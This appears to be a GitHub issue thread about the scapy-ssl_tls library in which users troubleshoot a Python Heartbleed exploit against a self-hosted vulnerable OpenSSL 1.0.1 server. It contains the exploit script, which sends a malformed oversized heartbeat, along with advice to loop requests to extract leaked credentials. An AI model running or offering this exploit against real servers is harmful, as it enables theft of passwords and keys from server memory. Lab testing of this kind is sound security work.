Heartbleed Attack not working

[efak]

I am using the code below for heartbleed attack but I am not getting the expected results. Is there something that I am missing?

import scapy
from scapy.layers.ssl_tls import *
import socket

#Specify the hostname and port number
target = ('www.myserver.com'),443)

# create tcp socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(target)
#p = TLSRecord(version="TLS_1_0")/TLSHandshake()/TLSClientHello(version="TLS_1_0")

# create TLS Handhsake / Client Hello packet
p = TLSRecord(version="TLS_1_0") / TLSHandshakes(handshakes=[TLSHandshake() /
                                                TLSClientHello(version="TLS_1_0", compression_methods=range(0xff)[::-1],
                                                               cipher_suites=range(0xff))])
s.sendall(str(p))
s.recv(8192)

# create TLS Heartbeat packet
p = TLSRecord(version="TLS_1_0")/TLSHeartBeat(length=2**14-1,data='bleed...')
s.sendall(str(p))

resp = s.recv(2**14-1)
print "resp: %s"%repr(resp)
s.close()

[tintinweb]

Hi @efak,

I've actually tested the example from the README against a vulnerable server some time ago. so that should work. What unexpected result do you get? What openssl version are you using?

[efak]

The vulnerable server (ubuntu12.04) I set up is using openssl version below: OpenSSL 1.0.1 14 Mar 2012

I am however running scapy-ssl/tls on Ubuntu16.04 running openssl version below: OpenSSL 1.0.2g 1 Mar 2016

I expected that the heartbeat response will contain passwords in the memory of my vulnerable server.

[tintinweb]

I guess the script is working then. What type of information you find depends on your server process. The vulnerability allows you to retrieve part of the process memory and this might include passwords and other credentials or source-code for example.

[efak]

When I use python code here, I am able to retrieve all the expected secrets. I am wondering why my scapy-ssl/tls script does not.

[tintinweb]

@efak please verify if you received a heartbeat response as well that it contains leaked bytes from the server. If that's the case then it is working but you'll still need to loop in heartbeat requests to extract more memory and potentially find secrets in the responses.

[efak]

I verified that I receive a heartbeat response with leaked bytes from the server but no secrets. I will loop the heartbeat requests and get back to you. Thank you

[efak]

The attack does not succeed even after looping. I put away my modified code and I am now using the exact sample heartbleed attack code in the README.md. Well, I changed "target.local" to my testing server that runs the vulnerable OpenSSL. I ran Wireshark on the server to examine the packet sent between the two machines. I do not see any TLS handshake packets and therefore I am assuming there is no TLS connection. My understanding was that there should be TLS connection between client and server machines before a heartbeat packet can be sent. If that is correct, how did that code work for you and is not working for me? I have attached the screenshot for the Wireshark.

[efak]

Just to let you know that my code works now and I am able to do the heartbleed attack. Great tool! Keep the good work up!

[userbox020]

bro, can you share your script. Mine doesnt work. I get this error

Traceback (most recent call last): File "ct3.py", line 9, in s.connect(target) File "C:\Users\LEON\Miniconda2\lib\socket.py", line 228, in meth return getattr(self._sock,name)(*args) socket.gaierror: [Errno 11004] getaddrinfo failed

Can you help me bro?